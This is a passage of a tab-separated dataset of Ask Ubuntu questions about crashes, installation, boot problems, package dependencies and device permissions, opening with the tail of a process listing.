? s < 12:04 0:00 [ kintegrityd ] root 24 0.0 0.0 0 0 ? s < 12:04 0:00 [ bioset ] root 25 0.0 0.0 0 0 ? s < 12:04 0:00 [ kworker/u9:0 ] root 26 0.0 0.0 0 0 ? s < 12:04 0:00 [ kblockd ] root 27 0.0 0.0 0 0 ? s < 12:04 0:00 [ ata_sff ] root 28 0.0 0.0 0 0 ? s 12:04 0:00 [ khubd ] root 29 0.0 0.0 0 0 ? s < 12:04 0:00 [ md ] root 30 0.0 0.0 0 0 ? s < 12:04 0:00 [ devfreq_wq ] root 32 0.0 0.0 0 0 ? s 12:04 0:00 [ khungtaskd ] root 33 0.7 0.0 0 0 ? s 12:04 1:17 [ kswapd0 ] root 34 0.0 0.0 0 0 ? sn 12:04 0:00 [ ksmd ] root 35 0.0 0.0 0 0 ? sn 12:04 0:01 [ khugepaged ] root 36 0.0 0.0 0 0 ? s 12:04 0:00 [ fsnotify_mark ] root 37 0.0 0.0 0 0 ? s 12:04 0:00 [ ecryptfs-kthreroot 38 0.0 0.0 0 0 ? s < 12:04 0:00 [ crypto ] root 50 0.0 0.0 0 0 ? s < 12:04 0:00 [ kthrotld ] root 70 0.0 0.0 0 0 ? s < 12:04 0:00 [ deferwq ] root 71 0.0 0.0 0 0 ? s < 12:04 0:00 [ charger_manageroot 113 0.0 0.0 0 0 ? s 12:04 0:00 [ scsi_eh_0 ] root 114 0.0 0.0 0 0 ? s 12:04 0:00 [ scsi_eh_1 ] root 117 0.0 0.0 0 0 ? s 12:04 0:00 [ scsi_eh_2 ] root 118 0.0 0.0 0 0 ? s 12:04 0:00 [ scsi_eh_3 ] root 121 0.0 0.0 0 0 ? s < 12:04 0:00 [ kpsmoused ] root 261 0.0 0.0 0 0 ? s < 12:05 0:00 [ kdmflush ] root 262 0.0 0.0 0 0 ? s < 12:05 0:00 [ bioset ] root 263 0.0 0.0 0 0 ? s < 12:05 0:00 [ kcryptd_io ] root 264 0.0 0.0 0 0 ? s < 12:05 0:00 [ kcryptd ] root 265 0.0 0.0 0 0 ? s < 12:05 0:00 [ bioset ] root 289 0.0 0.0 0 0 ? s < 12:05 0:00 [ kdmflush ] root 290 0.0 0.0 0 0 ? s < 12:05 0:00 [ bioset ] root 292 0.0 0.0 0 0 ? s < 12:05 0:00 [ kdmflush ] root 294 0.0 0.0 0 0 ? s < 12:05 0:00 [ bioset ] root 337 0.0 0.0 0 0 ? s < 12:05 0:00 [ kworker/u9:1 ] root 338 0.0 0.0 0 0 ? s 12:05 0:01 [ jbd2/dm-1-8 ] root 339 0.0 0.0 0 0 ? s < 12:05 0:00 [ ext4-rsv-converoot 375 0.0 0.0 28816 476 ? s 12:05 0:00 mountall -- daemroot 465 0.0 0.0 19476 240 ? s 12:05 0:00 upstart-udev-brroot 472 0.0 0.0 51708 936 ? ss 12:05 0:00 /lib/systemd/syroot 568 0.0 0.0 0 0 ? s < 12:05 0:00 [ kmpathd ] root 569 0.0 0.0 0 0 ? s < 12:05 0:00 [ kmpath_handlerroot 614 0.0 0.0 0 0 ? s < 12:05 0:00 [ ext4-rsv-converoot 756 0.0 0.0 15276 232 ? s 12:05 0:00 upstart-file-brsyslog 803 0.0 0.0 255844 720 ? ssl 12:05 0:00 rsyslogd message+ 898 0.0 0.1 40024 1160 ? ss 12:05 0:00 dbus-daemon -- sroot 916 0.0 0.0 15392 384 ? s 12:05 0:00 upstart-socket-root 934 0.0 0.0 19292 280 ? ss 12:05 0:00 /usr/sbin/bluetavahi 943 0.0 0.0 32348 312 ? s 12:05 0:00 avahi-daemon : ravahi 944 0.0 0.0 32224 248 ? s 12:05 0:00 avahi-daemon : croot 948 0.0 0.2 10232 2292 ? ss 12:05 0:00 dhclient -1 -v root 958 0.0 0.0 43564 396 ? ss 12:05 0:00 /lib/systemd/syroot 981 0.0 0.0 0 0 ? s < 12:05 0:00 [ krfcommd ] root 1063 0.0 0.0 23532 348 ? ss 12:05 0:00 /usr/sbin/vsftproot 1067 0.0 0.1 330232 1132 ? ssl 12:05 0:00 /usr/sbin/modemroot 1261 0.0 0.1 345620 1532 ? ssl 12:05 0:00 networkmanager root 1290 0.0 0.2 284140 2184 ? sl 12:05 0:00 /usr/lib/policyroot 1416 0.0 0.0 15820 168 tty4 ss+ 12:05 0:00 /sbin/getty -8 root 1420 0.0 0.0 15820 164 tty5 ss+ 12:05 0:00 /sbin/getty -8 root 1427 0.0 0.0 15820 160 tty2 ss+ 12:05 0:00 /sbin/getty -8 root 1428 0.0 0.0 15820 152 tty3 ss+ 12:05 0:00 /sbin/getty -8 root 1432 0.0 0.0 15820 164 tty6 ss+ 12:05 0:00 /sbin/getty -8 root 1474 0.0 0.0 61364 684 ? ss 12:05 0:00 /usr/sbin/sshd root 1489 0.0 0.0 4368 172 ? ss 12:05 0:00 acpid -c /etc/aroot 1493 0.0 0.0 23656 320 ? ss 12:05 0:00 cron root 1509 0.0 0.3 351608 2952 ? slsl 12:05 0:00 lightdm whoopsie 1527 0.0 0.3 364832 3384 ? ssl 12:05 0:00 whoopsie root 1530 0.8 3.8 307532 37076 tty7 ss+ 12:05 1:24 /usr/bin/x -corroot 1535 0.0 0.1 287588 1104 ? sl 12:05 0:00 /usr/lib/accounroot 1538 0.0 0.0 73220 904 ? ss 12:05 0:00 /usr/sbin/cups-root 1667 0.0 0.0 0 0 ? s 12:05 0:00 [ kauditd ] openldap 1720 0.0 1.3 270452 12728 ? ssl 12:05 0:00 /usr/sbin/slapdroot 1896 0.0 0.1 190908 1116 ? sl 12:05 0:00 lightdm -- sessintp 2154 0.0 0.0 33504 604 ? ss 12:06 0:02 /usr/sbin/ntpd kittykat 2201 0.0 0.0 35732 696 ? ss 12:06 0:00 init -- user root 2212 0.0 0.1 74720 1084 ? ss 12:06 0:00 /usr/sbin/cupsdkittykat 2285 0.0 0.0 40072 860 ? ss 12:06 0:00 dbus-daemon -- fkittykat 2288 0.0 0.0 10616 316 ? ss 12:06 0:00 ssh-agent -s kittykat 2293 0.0 0.0 18104 212 ? ss 12:06 0:00 upstart-event-bkittykat 2317 0.0 0.0 26588 296 ? s 12:06 0:00 upstart-file-brkittykat 2320 0.0 0.0 18112 232 ? s 12:06 0:00 upstart-dbus-brkittykat 2321 0.0 0.0 18112 232 ? s 12:06 0:00 upstart-dbus-brkittykat 2323 0.0 0.1 357512 1396 ? ssl 12:06 0:09 /usr/bin/ibus-dkittykat 2335 0.0 0.4 533240 4716 ? ssl 12:06 0:00 /usr/bin/lxsesskittykat 2339 0.0 0.0 192444 620 ? sl 12:06 0:00 /usr/lib/gvfs/gkittykat 2344 0.0 0.0 276688 604 ? sl 12:06 0:00 /usr/lib/ibus/ikittykat 2346 0.0 0.0 345664 636 ? sl 12:06 0:00 /usr/lib/gvfs/gkittykat 2353 0.0 0.6 459784 6512 ? sl 12:06 0:02 /usr/lib/ibus/ikittykat 2358 0.0 0.1 287660 1660 ? sl 12:06 0:04 /usr/lib/ibus/ikittykat 2369 0.0 0.0 200956 896 ? sl 12:06 0:02 /usr/lib/ibus/ikittykat 2394 0.0 0.4 277832 4036 ? sl 12:06 0:02 openbox -- confikittykat 2397 0.0 0.6 629192 6232 ? dl 12:06 0:09 lxpanel -- profikittykat 2398 0.8 2.3 749208 22308 ? sl 12:06 1:23 pcmanfm -- desktkittykat 2403 0.0 0.0 10616 316 ? ss 12:06 0:00 /usr/bin/ssh-agkittykat 2405 0.0 0.4 431920 4140 ? sl 12:06 0:00 nm-applet kittykat 2417 0.0 0.4 619728 4236 ? sl 12:06 0:00 update-notifierkittykat 2425 0.0 0.2 204020 2644 ? ssl 12:06 0:00 /usr/lib/x86_64kittykat 2432 0.0 0.1 524548 1656 ? sl 12:06 0:00 zeitgeist-datahkittykat 2434 0.0 0.2 368512 2020 ? sl 12:06 0:01 /usr/lib/gvfs/gkittykat 2444 0.0 0.1 218304 1412 ? sl 12:06 0:00 light-locker root 2447 0.0 0.2 437052 2184 ? sl 12:06 0:09 /usr/lib/udiskskittykat 2449 0.0 0.3 313532 3068 ? sl 12:06 0:00 /usr/lib/notifikittykat 2463 0.0 0.3 331276 2908 ? sl 12:06 0:00 /usr/bin/zeitgekittykat 2472 0.0 0.1 233192 1068 ? sl 12:06 0:00 /usr/lib/x86_64kittykat 2476 0.0 0.2 208244 2788 ? sl 12:06 0:00 /usr/lib/gvfs/gkittykat 2489 0.0 0.0 196080 592 ? sl 12:06 0:00 /usr/lib/gvfs/gkittykat 2491 0.0 0.0 120284 552 ? sl 12:06 0:00 /usr/lib/gvfs/gkittykat 2499 0.0 0.0 281768 600 ? sl 12:06 0:00 /usr/lib/gvfs/gkittykat 2506 0.0 0.0 7216 76 ? s 12:06 0:00 /bin/cat kittykat 2510 0.0 0.0 53040 592 ? s 12:06 0:00 /usr/lib/x86_64kittykat 2519 0.0 0.1 576488 964 ? sl 12:06 0:00 /usr/lib/gvfs/gclamav 2567 0.2 30.4 420144 289332 ? ssl 12:06 0:24 /usr/sbin/clamdclamav 2682 0.1 0.1 43876 996 ? ss 12:07 0:13 /usr/bin/freshciredapd 2734 0.0 0.5 95380 5556 ? s 12:07 0:00 python /opt/irekernoops 2739 0.0 0.0 37144 336 ? ss 12:07 0:00 /usr/sbin/kernekittykat 2780 1.2 3.9 791484 37940 ? sl 12:07 2:03 /usr/bin/pythonroot 2968 0.0 0.0 15820 160 tty1 ss+ 12:07 0:00 /sbin/getty -8 root 3393 0.0 1.4 188660 13424 ? sl 12:22 0:01 python3 /usr/likittykat 3749 4.2 10.1 1104212 96724 ? sl 12:43 5:32 /usr/bin/pythonkittykat 3874 0.0 0.0 4444 152 ? ss 12:46 0:00 /bin/sh /usr/bikittykat 3884 12.0 14.0 932852 134064 ? dl 12:46 15:16 /usr/lib/firefokittykat 3897 0.0 0.0 263688 456 ? sl 12:46 0:00 /usr/lib/at-spikittykat 3941 0.0 2.0 628892 19340 ? sl 12:47 0:02 /usr/bin/pythonkittykat 3947 0.0 0.0 14824 152 ? s 12:47 0:00 gnome-pty-helpekittykat 3948 0.0 0.2 22920 2340 pts/1 ss 12:47 0:00 /bin/bash kittykat 3967 0.1 3.4 739648 32932 pts/1 sl+ 12:48 0:11 python /home/kikittykat 4017 0.0 0.0 0 0 ? zs 12:49 0:00 [ xdg-open ] < defroot 4360 0.0 0.0 0 0 ? s 14:17 0:00 [ kworker/u8:2 ] root 4376 0.0 0.1 593100 1104 ? sl 14:21 0:00 /usr/sbin/consoroot 4509 2.9 0.0 0 0 ? s 14:36 0:29 [ kworker/0:2 ] root 4545 3.3 0.0 0 0 ? r 14:41 0:22 [ kworker/0:0 ] root 4553 0.0 0.0 0 0 ? s 14:43 0:00 [ kworker/u8:1 ] root 4575 0.1 0.0 68056 812 ? ss 14:50 0:00 sshd : kittykat root 4579 0.0 0.0 0 0 ? s 14:51 0:00 [ kworker/u8:0 ] root 4584 5.6 0.0 0 0 ? s 14:51 0:04 [ kworker/0:1 ] kittykat 4585 0.0 0.1 68204 972 ? s 14:51 0:00 sshd : kittykat @ kittykat 4586 0.5 0.2 20052 2384 pts/4 ss 14:52 0:00 -bash kittykat 4602 1.2 0.0 15568 872 pts/4 r+ 14:52 0:00 ps aux kittykat @ zimserver : ~ $
520453	ubuntu crash . maybe `` mtrr '' ?	i 've a problem with ubuntu 14.04 . it block . the `` capslock '' , and `` numlock '' does n't work . i must do a reset ( with the button ) . the mouse do n't move anymore . i 've desactivate `` zram '' now . here a part of error message . sep 5 10:41:35 fabrice-ms-7514 kernel : [ 0.077160 ] mtrr : your cpus had inconsistent variable mtrr settings sep 5 10:41:35 fabrice-ms-7514 kernel : [ 0.077160 ] mtrr : probably your bios does not setup all cpus . sep 5 10:41:35 fabrice-ms-7514 kernel : [ 0.077160 ] mtrr : corrected configuration . sep 5 10:41:35 fabrice-ms-7514 kernel : [ 0.090378 ] pci 0000:00:1f.0 : address space collision : [ io 0x0800-0x087f ] conflicts with acpi cpu throttle [ ? ? ? 0x00000810-0x00000815 flags 0x80000000 ] sep 5 10:41:35 fabrice-ms-7514 kernel : [ 0.091487 ] pci 0000:02:00.0 : disabling aspm on pre-1.1 pcie device . you can enable it with 'pcie_aspm=force' sep 5 10:41:36 fabrice-ms-7514 kernel : [ 84.960230 ] zram : module is from the staging directory , the quality is unknown , you have been warned . sep 5 10:41:41 fabrice-ms-7514 kernel : [ 89.640495 ] init : samba-ad-dc main process ( 1179 ) terminated with status 1 can anybody help me ? regards , fabrice
520454	why do we use ctrl + c / ctrl + x / ctrl + z in terminal ?	why do we have to use all this shortcut to quit the programs in terminal ? for example : ctrl+c in order to quit top ctrl+z in order to quit man ctrl+x in order to quit nano ctrl+c is n't suppose to kill the program ?
520455	alongside windows 7 option missing in ubuntu 14.04 lts	hi i was trying to install ubuntu 14.04 desktop edition through a bootable usb but while installing ubuntu it is not showing the the option alongside windows ( basically it is not detecting windows in my system ) . i also tried the option something else but it is not showing windows 7 in it and the hdd is appearing to be as a single unit with partitions missing . thanks in advance ! system configuration : intel i3 4130 4gb ram 1tb hdd
520457	problems with ubuntu gnome 14.04 and maximus	i 'm currently running ubuntu gnome 14.04 and i also installed maximus because i greatly value every square inch of window space ( i 'm greedy like that ) . my issue is anytime a window is maximized ( whether a new window opens maximized , or if i maximize it myself ) , the system does n't load it properly so i have to press alt+f2 , type in r , hit enter ( shell reload ) and it fixes it . while this works , it 's annoying and i 'd really like to have it fixed . the settings i have , if this helps , were edited in gconf-editor . i have no_maximize set to true , and undecorate set to true . it makes no difference if i change no_maximize back to false .
520459	does jenkins work with apache ?	hi i have a ubuntu server with apache running . ** i do not have tomcat** . i installed jenkins using wget -q -o - https : //jenkins-ci.org/debian/jenkins-ci.org.key | sudo apt-key add - sudo sh -c 'echo deb http : //pkg.jenkins-ci.org/debian binary/ > /etc/apt/sources.list.d/jenkins.list' sudo apt-get update sudo apt-get install jenkins and i tried to acees it using http : //ip-address:8080 v. but it is not working but when i type service jenkins status it is running : ) , but i when i try by typing java -jar jenkins.war it says unable to access jarfile jenkins.war actually i am stuck here for 3 days now . finnaly i found somethying that jenkins with tomcat like thing . so if i am using jenkins with apache do i need to follow extra steps , please help me , thanks in advance
520460	how to install vagrant if ruby is already installed in the system ?	i had installed ruby via rbenv and installed the latest stable version from their repository . i have also configured ruby for all the users . now , when i am trying to install vagrant via apt-get it shows the ruby dependencies and suggesting packages that are available in the ubuntu repositories . how can i tell apt-get that ruby is already installed in the system ?
520462	what does man command do in broader sense ?	while reading about linux , i got the following about man ( manual ) pages : the man pages are the most often-used source of linux documentation . they provide in-depth documentation about many programs and utilities as well as other topics , including configuration files , system calls , library routines , and the kernel . i am new to this flavor , so can someone explain me the specific jargons like : configuration files ( why and how are they used ) system calls ( i guess it is related to the system calls invoked while executing these commands - correct me if i am wrong ) what are library routines associated with any command ? and how kernel information is related to any command ? i tried some of these commands as man more but again its too long and difficult for me to totally get it : is there any easy reference for beginners like me ?
520463	ungraceful shutdown ( hard-drive spinning while powered off )	most times ( not always ) during shutdown of my kubuntu laptop , the hard drive make a noise as if it was powered off without warning . how can i ensure the system waits until everything is ok before it powers off ? running kubuntu 14.04 on a 2006 toshiba laptop edit : as a temporary solution , i 'm now using the command sudo shutdown -h now making the system halt instead of power off after shutdown , then i have to press the power button for 3 seconds to force a power off . the hard-drive does n't make the noise that way .
520465	how to access ibus advanced settings on ubuntu 14.04 ?	on ubuntu 12.04 there used to be a separate settings menu where one could tell ibus to use the system keyboard layout for all input methods and specify different shortcuts for toggling ibus on/off and switching to another input method . now that ibus settings are integrated into text entry on ubuntu 14.04 , both options are unavailable . by default , some input methods on 14.04 use the system keyboard layout ( like ibus-mozc ) , others do n't ( like ibus-sunpinyin ) . it is also not possible to toggle ibus on/off using a shortcut , since only one shortcut can be defined to `` switch to the next source '' , which cycles through all installed input methods before returning to 'off ' state , making quick switching between languages tedious . is there a way to access the 'old ' ibus settings menu , or are other workarounds available for both problems ?
520467	how to prevent skype crashing the wifi connection	the skype program on my ubuntu 14 causes crash in my wifi . after one minute in a call my wifi crashes and i have to restart my computer . i want to fix this issue so that i can speak with skype without problems . a small research in the web revealed two suggestions : change the port to something different of 80 disable upnp i checked that my port is something reasonable and not 80 . additionally i do n't see the upnp option , so i assume it is ok the command sudo lshw -c network gives *-network description : wireless interface product : rtl8821ae 802.11ac pcie wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 54:27:1e:28:9d:45 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8821ae driverversion=3.16.0-14-generic firmware=n/a ip=192.168.1.102 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:17 ioport : e000 ( size=256 ) memory : d0700000-d0703fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:03:00.2 logical name : eth0 version : 06 serial : 40:16:7e:3f:63:57 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8402-1_0.0.1 10/26/11 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:106 ioport : d000 ( size=256 ) memory : d0614000-d0614fff memory : d0610000-d0613fff what can i check more ?
520468	booting problems : ubuntu 14.04 versus windows7	i have installed ubuntu 14.04 with windows 7 , no problem with ubuntu but when i take windows7 , i have problems in booting 50 % of times , lines appears on the screen then i need to restart from the beggining at least 2-3 times . how can solve this probelm , i have a new pc with intel i7 ? many thanks for your help perin
520473	installing pybluez for python 3 in ubuntu touch	i 'm having problems with pybluez in ubuntu touch . $ pip3 install pybluez exits with an error : error : command 'arm-linux-gnueabihf-gcc ' failed with exit status 1 the complete log is here : http : //paste.ubuntu.com/8258178/
520478	upgrading process interrupted ( from ubuntu 12 to 14 )	i was upgrading ubuntu 12.04 to 14 , and in the middle of the process , the power went off . now my laptop doesn’t start and i have very important information that i need on the hard drive . this is the current status of the laptop and the things i’ve done trying to fix it : i turn on the laptop and it gives me five options : ubuntu , with linux 3.8 generic . ubuntu , with linux 3.8 generic ( recovery mode ) . previous linux versions . memory test ( memtest86+ ) . memory test ( memtest86+ , serial console 115200 ) . from the above list , and based on the forums , i’ve tried the second option ( ubuntu… ( recovery mode ) ) . once there , i’ve tried : resume resume normal boot ( filesystem check or mount failed . a maintance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored ) . dpkg repair broken packages ( after selecting ok , says : /lib/recovery-mode/recovery-menu : line 76 : /etc/default/rcs : no such file or directory fsck from util-linux 2.20.1 /dev/sda1 : clean , 554919/9609216 files , 23666655/38419712 blocks ) grub upgdate grub bootloader ( doesn’t work , neither sudo apt-get update nor sudo apt-get upgrade ) network enable networking ( same outcome than in dpkg ) i also tried booting from a cd but doesn’t work either . the ubuntu installer i’ve is for windows . when i checked the general status , this is the report i receive : general information system mode : read only cpu information : 2x1600mhz network connectivity : none detailed disk usage filesystem size , used , avail , use ( the previous 4 items match with my hard drive usage ) mounted on /dev/sda1 software raid state no software raid detected ( mdstat ) lvm state no lvm detected ( vgscan ) system database ( apt ) database is consistent : unknown ( read-only filesystem ) i 'm not very knowledgable on this matter . thank you in advance to whoever can help me with this . cheers . oscar .
520480	problem with an bootable usb	i have ubuntu windows and i want to install new one , kali linux for example . i tryed unetbootin program and it completes fine , after going to a boot menu and booting from usb , it gave me third time some unetbootin bluescreen and in the box over there is only an default option which aint do nothing , any advices ?
520481	how to specify preferred cjk han variant on ubuntu 14.04 ?	on ubuntu 12.04 it used to be possible to specify the preferred variant for cjk han characters using a script called fontconfig-voodoo which was contained in the language-selector files . setting either chinese , japanese or korean as the default would apply certain fontconfig tweaks to make the characters look properly ( aliasing/hinting/etc . ) and default to the appropriate local variant . on ubuntu 14.04 this script is unavailable and east asian cjk characters do n't look particularly appealing by default . is there a way to replicate the effects of fontconfig-voodoo on ubuntu 14.04 ?
520483	fixing installation of bower and grunt	i have screwed up installation and now when i do : bower install i get the following : bash : /usr/local/bin/bower : /usr/bin/env : bad interpreter : too many levels of symbolic links how do i fix this , sorry for a probably dumb question , just starting to use linux
520484	problems installing xbmc on my old ubuntu machine	when i try to install xbmc in accordance with the guidelines , sudo apt-get install python-software-properties pkg-config sudo apt-get install software-properties-common sudo add-apt-repository ppa : team-xbmc/ppa sudo apt-get update sudo apt-get install xbmc i receive the following feedback from my ubuntu 11.10 system : ~ $ sudo apt-get install xbmc reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xbmc : depends : xbmc-bin ( > = 2:12.2~git20130502.1706-frodo-0oneiric ) but it is not going to be installed depends : xbmc-bin ( < 2:12.2~git20130502.1706-frodo-0oneiric.1~ ) but it is not going to be installed depends : mesa-utils but it is not installable depends : python-bluez but it is not installable or python-lightblue but it is not installable depends : swig but it is not installable depends : libaacs0 but it is not installable depends : libcec2 ( > = 2.1.1 ) but it is not going to be installed recommends : python-qt3 but it is not installable recommends : xbmc-pvr-mythtv-cmyth but it is not going to be installed recommends : xbmc-pvr-vuplus but it is not going to be installed recommends : xbmc-pvr-vdr-vnsi but it is not going to be installed recommends : xbmc-pvr-njoy but it is not going to be installed recommends : xbmc-pvr-nextpvr but it is not going to be installed recommends : xbmc-pvr-mediaportal-tvserver but it is not going to be installed recommends : xbmc-pvr-tvheadend-hts but it is not going to be installed recommends : xbmc-pvr-dvbviewer but it is not going to be installed recommends : xbmc-pvr-argustv but it is not going to be installed e : unable to correct problems , you have held broken packages . i have no clue as to what to do . obviously there are unmet dependencies ( yes i can read ) , but part of the instructions were to add the repository 'ppa : team-xbmc/ppa ' , and if more was needed , it should be mentioned , one would think . i have a bad feeling this has to do with the fact that i am trying this on an old version of linux , but at the moment i am not prepared to upgrade that machine , for reasons i will not get into . what steps should i go to in order to ensure that i meet these dependencies ? i am looking for something like a list of repositories that i need to add or something . i do have the normal ones , but obviously something is missing here . i setup a vm ubuntu 14.04 on my mac just to try it out , and it installed xbmc without any problems whatsoever . pretty please , help this noob along the way ! since writing this question , it has been brought to my attention that you should not ask ubuntu-questions about ubuntu versions no longer supported . still , it has been answered ( ! ) , but in the comment section where i can not mark it as solved . which i would indeed like to do !
520486	how to get netflix working ?	netflix is the only service that requires me to keep windows around . i 've tried several times to install the netflix desktop but without success . ca n't get it to work using chrome or firefox . how do i get this to work ?
520487	what is the difference between analog input and internal microphone ?	i am running ubuntu 14.04 , and my sound works just fine . however , when i open the sound dialog , i notice that under input there are two available options as far as i can tell , my laptop has an integrated microphone and a small port where i can connect an external microphone , but this does not explain the two entries since i think they are both receiving input from the built-in microphone . so , what is the difference ? addition : i should note that both of the actually work just fine . i did some more investigation using pavucontrol which actually gives three options i still do n't quite understand what is going on , and why there are additional options . perhaps a pulse expert can jump in ?
520490	configuration error for pep8 and flymake for emacs	i am trying to configure pep8 to ignore e221 , e222 , and e226 ( all related to spacing around operators ) . i followed this documentation https : //pep8.readthedocs.org/en/1.4.6/intro.html to generate a .config/pep8 file . my actual file looks like this : [ pep8 ] ignore=e123 , e133 , e221 , e222 , e226 , e241 , e242 max-line-length = 100 the problem is that flymake crashes and complains that there is a configuration error . if i remove e226 , flymake and pep8 work fine -- although pep8 now complains about spaces around math operators . if i remove e221 and e222 , flymake and pep8 work fine -- although pep8 now complains about numbers of spaces . the point of the configuration was to avoid these warnings . i do n't see how they are logically conflicting and would expect this to work . my questions are : 1 ) is there a reason this type of configuration is not acceptable to pep8 ? i.e. , why ca n't i do this ? 2 ) if its a bug , is it a problem of pep8 or flymake ? how to tell ? i 'm using : ubuntu 14.04 emacs 24.3+1-2ubuntu1 pep8 1.4.6-1.1build1 cheers , -- jim
520493	apport is not creating .crash file for java crashes	i am having issues on production server , it is groovy/grails application and i am using quartz to run many crons . there is one cron which is when enabled crashes the jvm . i have no idea why . i ca n't find any crash dumps or any logs . i found that the jvm is calling apport for crash report but apport is ignoring it . i read that apport also creates something.crash file inside /var/crash directory but i do n't know it is not creating for java crashes . here 's the log from apport.log file . error : apport ( pid 2150 ) fri sep 5 05:29:31 2014 : called for pid 2100 , signal 11 error : apport ( pid 2150 ) fri sep 5 05:29:31 2014 : executable : /usr/local/java/bin/java ( command line `` /usr/local/java/bin/java -djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -djvmarg=-xms1024m -xmx4096m -xx : permsize=128m -xx : maxpermsize=1024m -xx : +printgcdetails -xx : +printgcdatestamps -xx : +printtenuringdistribution -xloggc : /usr/local/tomcat/logs/gc.log -djava.util.logging.manager=org.apache.juli.classloaderlogmanager -djava.endorsed.dirs=/usr/local/tomcat/endorsed -classpath /usr/local/tomcat/bin/bootstrap.jar -dcatalina.base=/usr/local/tomcat -dcatalina.home=/usr/local/tomcat -djava.io.tmpdir=/usr/local/tomcat/temp org.apache.catalina.startup.bootstrap start '' ) error : apport ( pid 2150 ) fri sep 5 05:29:31 2014 : executable does not belong to a package , ignoring please suggest me how to enable crash dump for apport or any other way to find out why java failed . let me know if you require any more information . thanks in advance .
520494	allow one process access to /dev/uninput without completely compromising security	steam in-home-streaming was turned back on the other day . this allows you to play games being rendered on one computer on another computer ( commonly playing games on a tv/media centre that are being rendered on a big noisy desktop in another room ) . that all works great except for input . steam reads input on the client and sends it to the remote steam instance . fairly simple stuff except that in order to read the raw input and inject it at the other end , both instances of steam need read/write access to /dev/uninput : in order to support streaming game controllers on a linux host computer , /dev/uinput or /dev/input/uinput needs to be readable and writable by steam . this leaves me in a bit of a quandary . do i : sudo chmod o+rw /dev/uninput to allow anything to read/write it ? sudo setfacl -m u : $ user : rw /dev/input to allow just my user to read/write ? something else i 'm unaware of ? even acl seems like it 's an unneccessary security risk ( any process under my user could , for example ) sniff out password entry . are there any ways of allowing just one application ( like a kernel `` capability '' /fscap ) to interact with uinput ?
520496	can only install some r-packages ( ubuntu 14.04 server )	i am trying to install the fastrweb package for r on this ubuntu server . i updated sources.list with : deb http : //ftp.heanet.ie/mirrors/cran.r-project.org/bin/linux/ubuntu trusty/ i have tried both : sudo apt-get install r-cran-fastrweb and , from inside r as an administrator : install.packages ( fastrweb ) neither work , i get the following output : reading packages list ... done building dependency tree reading state information ... done e : unable to locate package r-cran-fastrweb however , i have been able to install some packages ( eg : rserve installed fine ) . help ! please !
520498	disable links to remote devices on desktop	on my desktop i mount several remote folders using sshfs , mount.cifs and so on . everything works , but i find annoying that icons pointing to the locations are created on the desktop when i mount the remote folders . i do n't want these icons on the desktop . is there a way to disable their creation ?
520500	is there a programmable way to tell if the screen is locked with the new unity interface ?	i have lots of stuff in my crontab , including some that talks to my screen . if i 'm not there for it to be notifying , i do n't really want it to run . is there a way i can check to see if the computer is locked , so i can keep it from doing things when i 'm not at my desk ? or , alternately , do other things only when i 'm not at my desk ? yes , i asked this question before . i am now on ubuntu 14.04 and unity , and the environment has changed . when i run gnome-screensaver-command -q , i get the screensaver is inactive whether the workstation is locked or not . a new environment requires a new answer .
520506	how does grub2 load the operating system	so i am curious about what is the process grub 2 is using to load an operating system ( ubuntu ) in an efi system .
520508	ca n't use 1080p . only 1024 on 768	i installed ubuntu 14.04 on my old htpc and for some reason i can not output 1080p video . i already tried going to the display settings , though my highest available resolution was 1024 on 768 . in addition i tried running windows and it worked flawlessly . specs : motherboard : gigabyte fsb1066 ga-945gcmx52 proccesor : intel® pentium ( r ) dual cpu e2140 @ 1.60ghz × 2 ( 32b ) onboard graphics card : intel® 945g x86/mmx/sse2 ram : soka ddr2 2gb hdd : seagate 80gb 7200rpm power supply : zeus atx-520w
520512	dell vostro fan not working properly after installing ubuntu 14.04	i am using dell vostro 1014 , and using ubuntu 14.04 lts . before 14.04 , it was 12.04 and instead of updating i do a fresh install of 14.04 . now my laptop fan is not working properly . it works for a few seconds ( 2-3 seconds ) and stops for 5-10 minutes . i do n't know why it is happening so . after checking using psensor , the screenshot is as below , note the graph of fan speed for an interval of 10 minutes .
520513	which more can i remove from my /boot in order to get space ?	i 'm using ubuntu ( 3.13.0-34 ) . i installed it , left 300m for boot , but seems that it was not enough anymore . i follow some instructions here and removed all older kernels from it . /dev/sda6 277m 212m 52m 81 % /boot /dev/sda9 625g 71g 522g 12 % /home /dev/sda1 496m 28m 469m 6 % /boot/efi cvgaviao @ ubuntu-dell : /boot $ ls -l total 35310 -rw-r -- r -- 1 root root 1162712 ago 13 13:45 abi-3.13.0-34-generic -rw-r -- r -- 1 root root 165611 ago 13 13:45 config-3.13.0-34-generic drwxr-xr-x 4 root root 4096 dez 31 1969 efi drwxr-xr-x 5 root root 1024 set 5 11:03 grub -rw-r -- r -- 1 root root 19145757 set 4 00:16 initrd.img-3.13.0-34-generic drwx -- -- -- 2 root root 12288 fev 22 2014 lost+found -rw-r -- r -- 1 root root 176500 mar 12 09:31 memtest86+.bin -rw-r -- r -- 1 root root 178176 mar 12 09:31 memtest86+.elf -rw-r -- r -- 1 root root 178680 mar 12 09:31 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 3381262 ago 13 13:45 system.map-3.13.0-34-generic -rw -- -- -- - 1 root root 5797728 ago 13 13:45 vmlinuz-3.13.0-34-generic -rw -- -- -- - 1 root root 5799640 ago 15 15:36 vmlinuz-3.13.0-34-generic.efi.signed but software updater show me this message : the upgrade needs a total of 73,0 m free space on disk '/boot ' . please free at least an additional 19,2 m of disk space on '/boot ' . 